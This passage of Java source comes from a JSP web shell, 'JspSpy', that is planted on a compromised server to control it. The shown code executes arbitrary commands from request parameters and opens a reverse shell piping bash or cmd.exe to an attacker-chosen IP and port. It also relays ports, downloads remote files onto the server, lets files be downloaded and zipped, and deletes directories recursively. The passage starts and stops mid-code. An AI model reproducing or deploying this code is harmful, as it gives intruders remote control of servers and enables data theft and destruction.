request.getParameter("program"); if (!Util.isEmpty(program)) { Process pro = Runtime.getRuntime().exec(program); JSession.setAttribute(MSG, "Program Has Run Success!"); ((Invoker) ins.get("vs")).invoke(request, response, JSession); } } } catch (Exception e) { throw e; } } } private static class DownInvoker extends DefaultInvoker { public boolean doBefore() { return false; } public boolean doAfter() { return false; } public void invoke(HttpServletRequest request, HttpServletResponse response, HttpSession JSession) throws Exception { try { String path = request.getParameter("path"); if (Util.isEmpty(path)) return; InputStream i = null; Object enter = JSession.getAttribute(ENTER); String fileName = null; if (enter == null) { File f = new File(path); if (!f.exists()) return; fileName = f.getName(); i = new FileInputStream(f); } else { ZipFile zf = new ZipFile((String) enter); ZipEntry entry = new ZipEntry(path); fileName = entry.getName().substring( entry.getName().lastIndexOf("/") + 1); i = zf.getInputStream(entry); } response.setHeader("Content-Disposition", "attachment;filename=" + URLEncoder.encode(fileName, PAGE_CHARSET)); BufferedInputStream input = new BufferedInputStream(i); BufferedOutputStream output = new BufferedOutputStream(response .getOutputStream()); byte[] data = new byte[1024]; int len = input.read(data); while (len != -1) { output.write(data, 0, len); len = input.read(data); } input.close(); output.close(); } catch (Exception e) { throw e; } } } //VDown private static class VdInvoker extends DefaultInvoker { public void invoke(HttpServletRequest request, HttpServletResponse response, HttpSession JSession) throws Exception { try { PrintWriter out = response.getWriter(); String savepath = request.getParameter("savepath"); String url = request.getParameter("url"); if (Util.isEmpty(url)) url = "http://www.baidu.com/"; if (Util.isEmpty(savepath)) { savepath = JSession.getAttribute(CURRENT_DIR).toString(); } if (!Util.isEmpty(JSession.getAttribute("done"))) { Util.outMsg(out, "Download Remote File Success!"); JSession.removeAttribute("done"); } out .println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\"><tr><td>" + "<form name=\"form1\" id=\"form1\" action=\"" + SHELL_NAME + "\" method=\"post\" >" + "<h2>Remote File DownLoad »</h2>" + "<p>" + "<input type=\"hidden\" name=\"o\" value=\"downRemote\">" + "<p>File URL: " + " <input class=\"input\" name=\"url\" value=\"" + url + "\" id=\"url\" type=\"text\" size=\"200\" /></p>" + "<p>Save Path: " + "<input class=\"input\" name=\"savepath\" id=\"savepath\" value=\"" + savepath + "\" type=\"text\" size=\"200\" /></p>" + "<input class=\"bt\" name=\"connect\" id=\"connect\" value=\"DownLoad\" type=\"submit\" size=\"100\" />" + "</p>" + "</form></table>"); } catch (Exception e) { throw e; } } } private static class DownRemoteInvoker extends DefaultInvoker { public boolean doBefore() { return true; } public boolean doAfter() { return true; } public void invoke(HttpServletRequest request, HttpServletResponse response, HttpSession JSession) throws Exception { try { String downFileUrl = request.getParameter("url"); String savePath = request.getParameter("savepath"); if (Util.isEmpty(downFileUrl) || Util.isEmpty(savePath)) return; URL downUrl = new URL(downFileUrl); URLConnection conn = downUrl.openConnection(); File tempF = new File(savePath); File saveF = tempF; if (tempF.isDirectory()) { String fName = downFileUrl.substring(downFileUrl .lastIndexOf("/") + 1); saveF = new File(tempF, fName); } BufferedInputStream in = new BufferedInputStream(conn .getInputStream()); BufferedOutputStream out = new BufferedOutputStream( new FileOutputStream(saveF)); byte[] data = new byte[1024]; int len = in.read(data); while (len != -1) { out.write(data, 0, len); len = in.read(data); } in.close(); out.close(); JSession.setAttribute("done", "d"); ((Invoker) ins.get("vd")).invoke(request, response, JSession); } catch (Exception e) { throw e; } } } private static class IndexInvoker extends DefaultInvoker { public void invoke(HttpServletRequest request, HttpServletResponse response, HttpSession JSession) throws Exception { try { ((Invoker) ins.get("filelist")).invoke(request, response, JSession); } catch (Exception e) { throw e; } } } private static class MkDirInvoker extends DefaultInvoker { public boolean doBefore() { return false; } public boolean doAfter() { return false; } public void invoke(HttpServletRequest request, HttpServletResponse response, HttpSession JSession) throws Exception { try { String name = request.getParameter("name"); File f = new File(name); if (!f.isAbsolute()) { String path = JSession.getAttribute(CURRENT_DIR).toString(); if (!path.endsWith("/")) path += "/"; path += name; f = new File(path); } f.mkdirs(); JSession.setAttribute(MSG, "Make Directory Success!"); response.sendRedirect(SHELL_NAME); } catch (Exception e) { throw e; } } } private static class MoveInvoker extends DefaultInvoker { public boolean doBefore() { return false; } public boolean doAfter() { return false; } public void invoke(HttpServletRequest request, HttpServletResponse response, HttpSession JSession) throws Exception { try { PrintWriter out = response.getWriter(); String src = request.getParameter("src"); String target = request.getParameter("to"); if (!Util.isEmpty(target) && !Util.isEmpty(src)) { File file = new File(src); if (file.renameTo(new File(target))) { JSession.setAttribute(MSG, "Move File Success!"); } else { String msg = "Move File Failed!"; if (file.isDirectory()) { msg += "The Move Will Failed When The Directory Is Not Empty."; } JSession.setAttribute(MSG, msg); } response.sendRedirect(SHELL_NAME); } } catch (Exception e) { throw e; } } } private static class RemoveDirInvoker extends DefaultInvoker { public boolean doBefore() { return false; } public boolean doAfter() { return false; } public void invoke(HttpServletRequest request, HttpServletResponse response, HttpSession JSession) throws Exception { try { String dir = request.getParameter("dir"); File file = new File(dir); if (file.exists()) { deleteFile(file); deleteDir(file); } JSession.setAttribute(MSG, "Remove Directory Success!"); response.sendRedirect(SHELL_NAME); } catch (Exception e) { throw e; } } public void deleteFile(File f) { if (f.isFile()) { f.delete(); } else { File[] list = f.listFiles(); for (int i = 0; i < list.length; i++) { File ff = list[i]; deleteFile(ff); } } } public void deleteDir(File f) { File[] list = f.listFiles(); if (list.length == 0) { f.delete(); } else { for (int i = 0; i < list.length; i++) { File ff = list[i]; deleteDir(ff); } deleteDir(f); } } } private static class PackBatchInvoker extends DefaultInvoker { public boolean doBefore() { return false; } public boolean doAfter() { return false; } public void invoke(HttpServletRequest request, HttpServletResponse response, HttpSession JSession) throws Exception { try { String files = request.getParameter("files"); if (Util.isEmpty(files)) return; String saveFileName = request.getParameter("savefilename"); File saveF = new File(JSession.getAttribute(CURRENT_DIR) .toString(), saveFileName); if (saveF.exists()) { JSession.setAttribute(MSG, "The File \"" + saveFileName + "\" Has Been Exists!"); response.sendRedirect(SHELL_NAME); return; } ZipOutputStream zout = new ZipOutputStream( new BufferedOutputStream(new FileOutputStream(saveF))); String[] arr = files.split(","); for (int i = 0; i < arr.length; i++) { String f = arr[i]; File pF = new File(JSession.getAttribute(CURRENT_DIR) .toString(), f); ZipEntry entry = new ZipEntry(pF.getName()); zout.putNextEntry(entry); FileInputStream fInput = new FileInputStream(pF); int len = 0; byte[] buf = new byte[1024]; while ((len = fInput.read(buf)) != -1) { zout.write(buf, 0, len); zout.flush(); } fInput.close(); } zout.close(); JSession.setAttribute(MSG, "Pack Files Success!"); response.sendRedirect(SHELL_NAME); } catch (Exception e) { throw e; } } } private static class VPackConfigInvoker extends DefaultInvoker { public void invoke(HttpServletRequest request, HttpServletResponse response, HttpSession JSession) throws Exception { try { PrintWriter out = response.getWriter(); String packfile = request.getParameter("packedfile"); String currentd = JSession.getAttribute(CURRENT_DIR).toString(); out .println("<form action='" + SHELL_NAME + "' method='post'>" + "<input type='hidden' name='o' value='pack'/>" + "<input type='hidden' name='config' value='true'/>" + "<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\">" + " <tr>" + " <td><h2 id=\"Bin_H2_Title\">Pack Configuration >><hr/></h2>" + " <div id=\"hOWTm\">" + " <table width=\"100%\" border=\"0\" cellpadding=\"4\" cellspacing=\"0\" style=\"margin:10px 0;\">" + " <tr align=\"center\">" + " <td style=\"5%\"></td>" + " <td align=\"center\"><table border=\"0\">" + " <tr>" + " <td>Packed Dir</td>" + " <td><input type=\"text\" name=\"packedfile\" size='100' value=\"" + packfile + "\" class=\"input\"/></td>" + " </tr>" + " <tr>" + " <td>Save To</td>" + " <td><input type=\"text\" name=\"savefilename\" size='100' value=\"" + ((currentd.endsWith("/") ? currentd : currentd + "/") + "pack.zip") + "\" class=\"input\"/></td>" + " </tr>" + " <tr>" + " <td colspan=\"2\"><fieldset><legend>Ext Filter</legend>" + " <input type='radio' name='extfilter' value='no'/>no <input checked type='radio' name='extfilter' value='blacklist'/>Blacklist <input type='radio' name='extfilter' value='whitelist'/>Whitelist" + " <hr/><input type='text' class='input' size='100' value='mp3,wmv,rm,rmvb,avi' name='fileext'/>" + " </fieldset></td>" + " </tr>" + " <tr>" + " <td>Filesize Filter</td>" + " <td><input type=\"text\" name=\"filesize\" value=\"0\" class=\"input\"/>(KB) " + " <input type='radio' name='sizefilter' value='no' checked>no <input type='radio' name='sizefilter' value='greaterthan'>greaterthan<input type='radio' name='sizefilter' value='lessthan'>lessthan</td>" + " </tr>" + " <tr>" + " <td>Exclude Dir</td>" + " <td><input type=\"text\" name=\"exclude\" size='100' class=\"input\"/></td>" + " </tr>" + " </table></td>" + " </tr>" + " <tr align=\"center\">" + " <td colspan=\"2\">" + " <input type=\"submit\" name=\"FJE\" value=\"Pack\" id=\"FJE\" class=\"bt\" />" + " </td>" + " </tr>" + " </table>" + " </div></td>" + " </tr>" + " </table></form>"); } catch (Exception e) { throw e; } } } private static class PackInvoker extends DefaultInvoker { public boolean doBefore() { return false; } public boolean doAfter() { return false; } private boolean config = false; private String extFilter = "blacklist"; private String[] fileExts = null; private String sizeFilter = "no"; private int filesize = 0; private String[] exclude = null; private String packFile = null; private void reset() { this.config = false; this.extFilter = "blacklist"; this.fileExts = null; this.sizeFilter = "no"; this.filesize = 0; this.exclude = null; this.packFile = null; } public void invoke(HttpServletRequest request, HttpServletResponse response, HttpSession JSession) throws Exception { try { String config = request.getParameter("config"); if (!Util.isEmpty(config) && config.equals("true")) { this.config = true; this.extFilter = request.getParameter("extfilter"); this.fileExts = request.getParameter("fileext").split(","); this.sizeFilter = request.getParameter("sizefilter"); this.filesize = Integer.parseInt(request .getParameter("filesize")); this.exclude = request.getParameter("exclude").split(","); } String packedFile = request.getParameter("packedfile"); if (Util.isEmpty(packedFile)) return; this.packFile = packedFile; String saveFileName = request.getParameter("savefilename"); File saveF = null; if (this.config) saveF = new File(saveFileName); else saveF = new File(JSession.getAttribute(CURRENT_DIR) .toString(), saveFileName); if (saveF.exists()) { JSession.setAttribute(MSG, "The File \"" + saveFileName + "\" Has Been Exists!"); response.sendRedirect(SHELL_NAME); return; } File pF = new File(packedFile); ZipOutputStream zout = null; String base = ""; if (pF.isDirectory()) { if (pF.listFiles().length == 0) { JSession .setAttribute(MSG, "No File To Pack ! Maybe The Directory Is Empty ."); response.sendRedirect(SHELL_NAME); this.reset(); return; } zout = new ZipOutputStream(new BufferedOutputStream( new FileOutputStream(saveF))); zipDir(pF, base, zout); } else { zout = new ZipOutputStream(new BufferedOutputStream( new FileOutputStream(saveF))); zipFile(pF, base, zout); } zout.close(); this.reset(); JSession.setAttribute(MSG, "Pack File Success!"); response.sendRedirect(SHELL_NAME); } catch (Exception e) { throw e; } } public void zipDir(File f, String base, ZipOutputStream zout) throws Exception { if (f.isDirectory()) { if (this.config) { String curName = f.getAbsolutePath().replace('\\', '/'); curName = curName.replaceAll("\\Q" + this.packFile + "\\E", ""); if (this.exclude != null) { for (int i = 0; i < exclude.length; i++) { if (!Util.isEmpty(exclude[i]) && curName.startsWith(exclude[i])) { return; } } } } File[] arr = f.listFiles(); for (int i = 0; i < arr.length; i++) { File ff = arr[i]; String tmpBase = base; if (!Util.isEmpty(tmpBase) && !tmpBase.endsWith("/")) tmpBase += "/"; zipDir(ff, tmpBase + f.getName(), zout); } } else { String tmpBase = base; if (!Util.isEmpty(tmpBase) && !tmpBase.endsWith("/")) tmpBase += "/"; zipFile(f, tmpBase, zout); } } public void zipFile(File f, String base, ZipOutputStream zout) throws Exception { if (this.config) { String ext = f.getName().substring( f.getName().lastIndexOf('.') + 1); if (this.extFilter.equals("blacklist")) { if (Util.exists(this.fileExts, ext)) { return; } } else if (this.extFilter.equals("whitelist")) { if (!Util.exists(this.fileExts, ext)) { return; } } if (!this.sizeFilter.equals("no")) { double size = f.length() / 1024; if (this.sizeFilter.equals("greaterthan")) { if (size < filesize) return; } else if (this.sizeFilter.equals("lessthan")) { if (size > filesize) return; } } } ZipEntry entry = new ZipEntry(base + f.getName()); zout.putNextEntry(entry); FileInputStream fInput = new FileInputStream(f); int len = 0; byte[] buf = new byte[1024]; while ((len = fInput.read(buf)) != -1) { zout.write(buf, 0, len); zout.flush(); } fInput.close(); } } private static class UnPackInvoker extends DefaultInvoker { public boolean doBefore() { return false; } public boolean doAfter() { return false; } public void invoke(HttpServletRequest request, HttpServletResponse response, HttpSession JSession) throws Exception { try { String savepath = request.getParameter("savepath"); String zipfile = request.getParameter("zipfile"); if (Util.isEmpty(savepath) || Util.isEmpty(zipfile)) return; File save = new File(savepath); save.mkdirs(); ZipFile file = new ZipFile(new File(zipfile)); Enumeration e = file.entries(); while (e.hasMoreElements()) { ZipEntry en = (ZipEntry) e.nextElement(); String entryPath = en.getName(); int index = entryPath.lastIndexOf("/"); if (index != -1) entryPath = entryPath.substring(0, index); File absEntryFile = new File(save, entryPath); if (!absEntryFile.exists() && (en.isDirectory() || en.getName().indexOf("/") != -1)) absEntryFile.mkdirs(); BufferedOutputStream output = null; BufferedInputStream input = null; try { output = new BufferedOutputStream(new FileOutputStream( new File(save, en.getName()))); input = new BufferedInputStream(file.getInputStream(en)); byte[] b = new byte[1024]; int len = input.read(b); while (len != -1) { output.write(b, 0, len); len = input.read(b); } } catch (Exception ex) { } finally { try { if (output != null) output.close(); if (input != null) input.close(); } catch (Exception ex1) { } } } file.close(); JSession.setAttribute(MSG, "UnPack File Success!"); response.sendRedirect(SHELL_NAME); } catch (Exception e) { throw e; } } } //VMapPort private static class VmpInvoker extends DefaultInvoker { public void invoke(HttpServletRequest request, HttpServletResponse response, HttpSession JSession) throws Exception { try { PrintWriter out = response.getWriter(); Object localIP = JSession.getAttribute("localIP"); Object localPort = JSession.getAttribute("localPort"); Object remoteIP = JSession.getAttribute("remoteIP"); Object remotePort = JSession.getAttribute("remotePort"); Object done = JSession.getAttribute("done"); JSession.removeAttribute("localIP"); JSession.removeAttribute("localPort"); JSession.removeAttribute("remoteIP"); JSession.removeAttribute("remotePort"); JSession.removeAttribute("done"); if (Util.isEmpty(localIP)) localIP = InetAddress.getLocalHost().getHostAddress(); if (Util.isEmpty(localPort)) localPort = "3389"; if (Util.isEmpty(remoteIP)) remoteIP = "www.baidu.com"; if (Util.isEmpty(remotePort)) remotePort = "80"; if (!Util.isEmpty(done)) Util.outMsg(out, done.toString()); out .println("<form action=\"" + SHELL_NAME + "\" method=\"post\">" + "<input type=\"hidden\" name=\"o\" value=\"mapPort\">" + " <table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\">" + " <tr>" + " <td><h2 id=\"Bin_H2_Title\">PortMap >><hr/></h2>" + " <div id=\"hOWTm\">" + " <table width=\"100%\" border=\"0\" cellpadding=\"4\" cellspacing=\"0\" style=\"margin:10px 0;\">" + " <tr align=\"center\">" + " <td style=\"5%\"></td>" + " <td style=\"20%\" align=\"left\"><br/>Local Ip :" + " <input name=\"localIP\" id=\"localIP\" type=\"text\" class=\"input\" size=\"20\" value=\"" + localIP + "\" />" + " </td>" + " <td style=\"20%\" align=\"left\">Local Port :" + " <input name=\"localPort\" id=\"localPort\" type=\"text\" class=\"input\" size=\"20\" value=\"" + localPort + "\" /></td>" + " <td style=\"20%\" align=\"left\">Remote Ip :" + " <input name=\"remoteIP\" id=\"remoteIP\" type=\"text\" class=\"input\" size=\"20\" value=\"" + remoteIP + "\" /></td>" + " <td style=\"20%\" align=\"left\">Remote Port :" + " <input name=\"remotePort\" id=\"remotePort\" type=\"text\" class=\"input\" size=\"20\" value=\"" + remotePort + "\" /></td>" + " </tr>" + " <tr align=\"center\">" + " <td colspan=\"5\"><br/>" + " <input type=\"submit\" name=\"FJE\" value=\"MapPort\" id=\"FJE\" class=\"bt\" />" + " <input type=\"button\" name=\"giX\" value=\"ClearAll\" id=\"giX\" onClick=\"location.href='" + SHELL_NAME + "?o=smp'\" class=\"bt\" />" + " </td>" + " </tr>" + " </table>" + " </div>" + "</td>" + "</tr>" + "</table>" + "</form>"); String targetIP = request.getParameter("targetIP"); String targetPort = request.getParameter("targetPort"); String yourIP = request.getParameter("yourIP"); String yourPort = request.getParameter("yourPort"); if (Util.isEmpty(targetIP)) targetIP = "127.0.0.1"; if (Util.isEmpty(targetPort)) targetPort = "3389"; if (Util.isEmpty(yourIP)) yourIP = request.getRemoteAddr(); if (Util.isEmpty(yourPort)) yourPort = "1234"; out .println("<form action=\"" + SHELL_NAME + "\" method=\"post\">" + "<input type=\"hidden\" name=\"o\" value=\"portBack\">" + " <table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\">" + " <tr>" + " <td><h2 id=\"Bin_H2_Title\">Port Back >><hr/></h2>" + " <div id=\"hOWTm\">" + " <table width=\"100%\" border=\"0\" cellpadding=\"4\" cellspacing=\"0\" style=\"margin:10px 0;\">" + " <tr align=\"center\">" + " <td style=\"5%\"></td>" + " <td style=\"20%\" align=\"left\"><br/>Target Ip :" + " <input name=\"targetIP\" id=\"targetIP\" type=\"text\" class=\"input\" size=\"20\" value=\"" + targetIP + "\" />" + " </td>" + " <td style=\"20%\" align=\"left\">Target Port :" + " <input name=\"targetPort\" id=\"targetPort\" type=\"text\" class=\"input\" size=\"20\" value=\"" + targetPort + "\" /></td>" + " <td style=\"20%\" align=\"left\">Your Ip :" + " <input name=\"yourIP\" id=\"yourIP\" type=\"text\" class=\"input\" size=\"20\" value=\"" + yourIP + "\" /></td>" + " <td style=\"20%\" align=\"left\">Your Port :" + " <input name=\"yourPort\" id=\"yourPort\" type=\"text\" class=\"input\" size=\"20\" value=\"" + yourPort + "\" /></td>" + " </tr>" + " <tr align=\"center\">" + " <td colspan=\"5\"><br/>" + " <input type=\"submit\" name=\"FJE\" value=\"Port Back\" id=\"FJE\" class=\"bt\" />" + " </td>" + " </tr>" + " </table>" + " </div>" + "</td>" + "</tr>" + "</table>" + "</form>"); } catch (Exception e) { throw e; } } } //StopMapPort private static class SmpInvoker extends DefaultInvoker { public boolean doAfter() { return true; } public boolean doBefore() { return true; } public void invoke(HttpServletRequest request, HttpServletResponse response, HttpSession JSession) throws Exception { try { Object obj = JSession.getAttribute(PORT_MAP); if (obj != null) { ServerSocket server = (ServerSocket) JSession .getAttribute(PORT_MAP); server.close(); } JSession.setAttribute("done", "Stop Success!"); ((Invoker) ins.get("vmp")).invoke(request, response, JSession); } catch (Exception e) { throw e; } } } //PortBack private static class PortBackInvoker extends DefaultInvoker { public boolean doAfter() { return true; } public boolean doBefore() { return true; } public void invoke(HttpServletRequest request, HttpServletResponse response, HttpSession JSession) throws Exception { try { String targetIP = request.getParameter("targetIP"); String targetPort = request.getParameter("targetPort"); String yourIP = request.getParameter("yourIP"); String yourPort = request.getParameter("yourPort"); Socket yourS = new Socket(); yourS.connect(new InetSocketAddress(yourIP, Integer .parseInt(yourPort))); Socket targetS = new Socket(); targetS.connect(new InetSocketAddress(targetIP, Integer .parseInt(targetPort))); StreamConnector.readFromLocal(new DataInputStream(targetS .getInputStream()), new DataOutputStream(yourS .getOutputStream())); StreamConnector.readFromRemote(targetS, yourS, new DataInputStream(yourS.getInputStream()), new DataOutputStream(targetS.getOutputStream())); JSession.setAttribute("done", "Port Back Success !"); ((Invoker) ins.get("vmp")).invoke(request, response, JSession); } catch (Exception e) { throw e; } } } private static class MapPortInvoker extends DefaultInvoker { public boolean doBefore() { return false; } public boolean doAfter() { return false; } public void invoke(HttpServletRequest request, HttpServletResponse response, HttpSession JSession) throws Exception { try { PrintWriter out = response.getWriter(); String localIP = request.getParameter("localIP"); String localPort = request.getParameter("localPort"); final String remoteIP = request.getParameter("remoteIP"); final String remotePort = request.getParameter("remotePort"); if (Util.isEmpty(localIP) || Util.isEmpty(localPort) || Util.isEmpty(remoteIP) || Util.isEmpty(remotePort)) return; Object obj = JSession.getAttribute(PORT_MAP); if (obj != null) { ServerSocket s = (ServerSocket) obj; s.close(); } final ServerSocket server = new ServerSocket(); server.bind(new InetSocketAddress(localIP, Integer .parseInt(localPort))); JSession.setAttribute(PORT_MAP, server); new Thread(new Runnable() { public void run() { while (true) { Socket soc = null; Socket remoteSoc = null; DataInputStream remoteIn = null; DataOutputStream remoteOut = null; DataInputStream localIn = null; DataOutputStream localOut = null; try { soc = server.accept(); remoteSoc = new Socket(); remoteSoc .connect(new InetSocketAddress( remoteIP, Integer .parseInt(remotePort))); remoteIn = new DataInputStream(remoteSoc .getInputStream()); remoteOut = new DataOutputStream(remoteSoc .getOutputStream()); localIn = new DataInputStream(soc .getInputStream()); localOut = new DataOutputStream(soc .getOutputStream()); StreamConnector.readFromLocal(localIn, remoteOut); StreamConnector.readFromRemote(soc, remoteSoc, remoteIn, localOut); } catch (Exception ex) { break; } } } }).start(); JSession.setAttribute("done", "Map Port Success!"); JSession.setAttribute("localIP", localIP); JSession.setAttribute("localPort", localPort); JSession.setAttribute("remoteIP", remoteIP); JSession.setAttribute("remotePort", remotePort); JSession.setAttribute(SESSION_O, "vmp"); response.sendRedirect(SHELL_NAME); } catch (Exception e) { throw e; } } } //VBackConnect private static class VbcInvoker extends DefaultInvoker { public void invoke(HttpServletRequest request, HttpServletResponse response, HttpSession JSession) throws Exception { try { PrintWriter out = response.getWriter(); Object ip = JSession.getAttribute("ip"); Object port = JSession.getAttribute("port"); Object program = JSession.getAttribute("program"); Object done = JSession.getAttribute("done"); JSession.removeAttribute("ip"); JSession.removeAttribute("port"); JSession.removeAttribute("program"); JSession.removeAttribute("done"); if (Util.isEmpty(ip)) ip = request.getRemoteAddr(); if (Util.isEmpty(port) || !Util.isInteger(port.toString())) port = "1234"; if (Util.isEmpty(program)) { if (ISLINUX) program = "/bin/bash"; else program = "cmd.exe"; } if (!Util.isEmpty(done)) Util.outMsg(out, done.toString()); out .println("<form action=\"" + SHELL_NAME + "\" method=\"post\">" + "<input type=\"hidden\" name=\"o\" value=\"backConnect\">" + " <table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\">" + " <tr>" + " <td><h2 id=\"Bin_H2_Title\">Back Connect >></h2>" + " <div id=\"hOWTm\">" + " <table width=\"100%\" border=\"0\" cellpadding=\"4\" cellspacing=\"0\" style=\"margin:10px 0;\">" + " <tr align=\"center\">" + " <td style=\"5%\"></td>" + " <td align=\"center\">Your Ip :" + " <input name=\"ip\" id=\"ip\" type=\"text\" class=\"input\" size=\"20\" value=\"" + ip + "\" />" + " Your Port :" + " <input name=\"port\" id=\"port\" type=\"text\" class=\"input\" size=\"20\" value=\"" + port + "\" />Program To Back :" + " <input name=\"program\" id=\"program\" type=\"text\" value=\"" + program + "\" class=\"input\" size=\"20\" value=\"d\" /></td>" + " </tr>" + " <tr align=\"center\">" + " <td colspan=\"2\"><br/>" + " <input type=\"submit\" name=\"FJE\" value=\"Connect\" id=\"FJE\" class=\"bt\" />" + " </td>" + " </tr>" + " </table>" + " </div>" + "</td>" + "</tr>" + "</table>" + "</form>"); } catch (Exception e) { throw e; } } } private static class BackConnectInvoker extends DefaultInvoker { public boolean doAfter() { return false; } public boolean doBefore() { return false; } public void invoke(HttpServletRequest request, HttpServletResponse response, HttpSession JSession) throws Exception { try { String ip = request.getParameter("ip"); String port = request.getParameter("port"); String program = request.getParameter("program"); if (Util.isEmpty(ip) || Util.isEmpty(program) || !Util.isInteger(port)) return; Socket socket = new Socket(ip, Integer.parseInt(port)); Process process = Runtime.getRuntime().exec(program); (new StreamConnector(process.getInputStream(), socket .getOutputStream())).start(); (new StreamConnector(process.getErrorStream(), socket .getOutputStream())).start(); (new StreamConnector(socket.getInputStream(), process .getOutputStream())).start(); JSession.setAttribute("done", "Back Connect Success!"); JSession.setAttribute("ip", ip); JSession.setAttribute("port", port); JSession.setAttribute("program", program); JSession.setAttribute(SESSION_O, "vbc"); response.sendRedirect(SHELL_NAME); } catch (Exception e) { throw e; } } } private static class JspEnvInvoker extends DefaultInvoker { public void invoke(HttpServletRequest request, HttpServletResponse response, HttpSession JSession) throws Exception { try { PrintWriter out = response.getWriter(); out .println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\">" + " <tr>" + " <td><h2 id=\"Ninty_H2_Title\">System Properties >></h2>" + " <div id=\"ghaB\">" + " <hr/>" + " <ul id=\"Ninty_Ul_Sys\" class=\"info\">"); Properties pro = System.getProperties(); Enumeration names = pro.propertyNames(); while (names.hasMoreElements()) { String name = (String) names.nextElement(); out.println("<li><u>" + Util.htmlEncode(name) + " : </u>" + Util.htmlEncode(pro.getProperty(name)) + "</li>"); } out .println("</ul><h2 id=\"Ninty_H2_Mac\">System Environment >></h2><hr/><ul id=\"Ninty_Ul_Sys\" class=\"info\">"); /* Map envs = System.getenv(); Set<Map.Entry<String,String>> entrySet = envs.entrySet(); for (Map.Entry<String,String> en:entrySet) { out.println("<li><u>"+Util.htmlEncode(en.getKey())+" : </u>"+Util.htmlEncode(en.getValue())+"</li>"); }*/ out .println("</ul></div></td>" + " </tr>" + " </table>"); } catch (Exception e) { throw e; } } } private static class ReflectInvoker extends DefaultInvoker { public void invoke(HttpServletRequest request, HttpServletResponse response, HttpSession JSession) throws Exception { try { PrintWriter out = response.getWriter(); String c = request.getParameter("Class"); Class cls = null; try { if (!Util.isEmpty(c)) cls = Class.forName(c); } catch (ClassNotFoundException ex) { Util.outMsg(out, "<span style='color:red'>Class " + c + " Not Found ! </span>"); } out .println("<form action=\"" + SHELL_NAME + "\" id='refForm' method=\"post\">" + " <input type=\"hidden\" name=\"o\" value=\"reflect\">" + " <table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\">" + " <tr>" + " <td><h2 id=\"Bin_H2_Title\">Java Reflect >></h2>" + " <table width=\"100%\" border=\"0\" cellpadding=\"4\" cellspacing=\"0\" style=\"margin:10px 0;\">" + " <tr>" + " <td>Class Name : <input name=\"Class\" type=\"text\" class=\"input\" value=\"" + (Util.isEmpty(c) ? "java.lang.Object" : c) + "\" size=\"60\"/> " + " <input type=\"submit\" class=\"bt\" value=\"Reflect\"/></td>" + " </tr>" + " " + " </table>" + " </td>" + " </tr>" + " </table>" + "</form>"); if (cls != null) { StringBuffer sb = new StringBuffer(); if (cls.getPackage() != null) sb.append("package " + cls.getPackage().getName() + ";\n"); String n = null; if (cls.isInterface()) n = ""; //else if (cls.isEnum()) // n = "enum"; else n = "class"; sb.append(Modifier.toString(cls.getModifiers()) + " " + n + " " + cls.getName() + "\n"); if (cls.getSuperclass() != null) sb .append("\textends <a href=\"javascript:document.forms['refForm'].elements['Class'].value='" + cls.getSuperclass().getName() + "';document.forms['refForm'].submit()\" style='color:red;'>" + cls.getSuperclass().getName() + "</a>\n"); if (cls.getInterfaces() != null && cls.getInterfaces().length != 0) { Class[] faces = cls.getInterfaces(); sb.append("\t implements "); for (int i = 0; i < faces.length; i++) { sb .append("<a href=\"javascript:document.forms['refForm'].elements['Class'].value='" + faces[i].getName() + "';document.forms['refForm'].submit()\" style='color:red'>" + faces[i].getName() + "</a>"); if (i != faces.length - 1) { sb.append(","); } } } sb.append("{\n\t\n"); sb.append("\t//constructors..\n"); Constructor[] cs = cls.getConstructors(); for (int i = 0; i < cs.length; i++) { Constructor cc = cs[i]; sb.append("\t" + cc + ";\n"); } sb.append("\n\t//fields\n"); Field[] fs = cls.getDeclaredFields(); for (int i = 0; i < fs.length; i++) { Field f = fs[i]; sb.append("\t" + f.toString() + ";"); if (Modifier.toString(f.getModifiers()).indexOf( "static") != -1) { sb.append("\t//value is : "); f.setAccessible(true); Object obj = f.get(null); sb.append("<span style='color:red'>"); if (obj != null) sb.append(obj.toString()); else sb.append("NULL"); sb.append("</span>"); } sb.append("\n"); } sb.append("\n\t//methods\n"); Method[] ms = cls.getDeclaredMethods(); for (int i = 0; i < ms.length; i++) { Method m = ms[i]; sb.append("\t" + m.toString() + ";\n"); } sb.append("}\n"); String m = "<span style='font-weight:normal'>" + Util.highLight(sb.toString()).replaceAll("\t", " ").replaceAll( "\n", "<br/>") + "</span>"; Util.outMsg(out, m, "left"); } } catch (Exception e) { throw e; } } } private static class TopInvoker extends DefaultInvoker { public void invoke(HttpServletRequest request, HttpServletResponse response, HttpSession JSession) throws Exception { try { PrintWriter out = response.getWriter(); out .println("<form action=\"" + SHELL_NAME + "\" method=\"post\" name=\"doForm\"></form>" + "<table width=\"100%\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\">" + " <tr class=\"head\">" + " <td><span style=\"float:right;\">JspSpy Ver: 2010</span>" + request.getHeader("host") + " (<span id='ip'>" + InetAddress.getLocalHost().getHostAddress() + "</span>) | <a href=\"javascript:if (!window.clipboardData){alert('only support IE!');}else{void(window.clipboardData.setData('Text', document.getElementById('ip').innerText));alert('ok')}\">copy</a></td>" + " </tr>" + " <tr class=\"alt1\">" + " <td><a href=\"javascript:doPost({o:'logout'});\">Logout</a> | " + " <a href=\"javascript:doPost({o:'fileList'});\">File Manager</a> | " + " <a href=\"javascript:doPost({o:'vConn'});\">DataBase Manager</a> | " + " <a href=\"javascript:doPost({o:'vs'});\">Execute Command</a> | " + " <a href=\"javascript:doPost({o:'vso'});\">Shell OnLine</a> | " + " <a href=\"javascript:doPost({o:'vbc'});\">Back Connect</a> | " + " <a href=\"javascript:doPost({o:'reflect'});\">Java Reflect</a> | " + " <!--<a href=\"javascript:alert('not support yet');\">Http Proxy</a> | -->" + " <a href=\"javascript:doPost({o:'ev'});\">Eval Java Code</a> | " + " <a href=\"javascript:doPost({o:'vPortScan'});;\">Port Scan</a> | " + " <a href=\"javascript:doPost({o:'vd'});\">Download Remote File</a> | " + " <a href=\"javascript:;doPost({o:'clipboard'});\">ClipBoard</a> | " + " <a href=\"javascript:doPost({o:'vmp'});\">Port Map</a> | " + " <a href=\"javascript:doPost({o:'vother'});\">Others</a> | " + 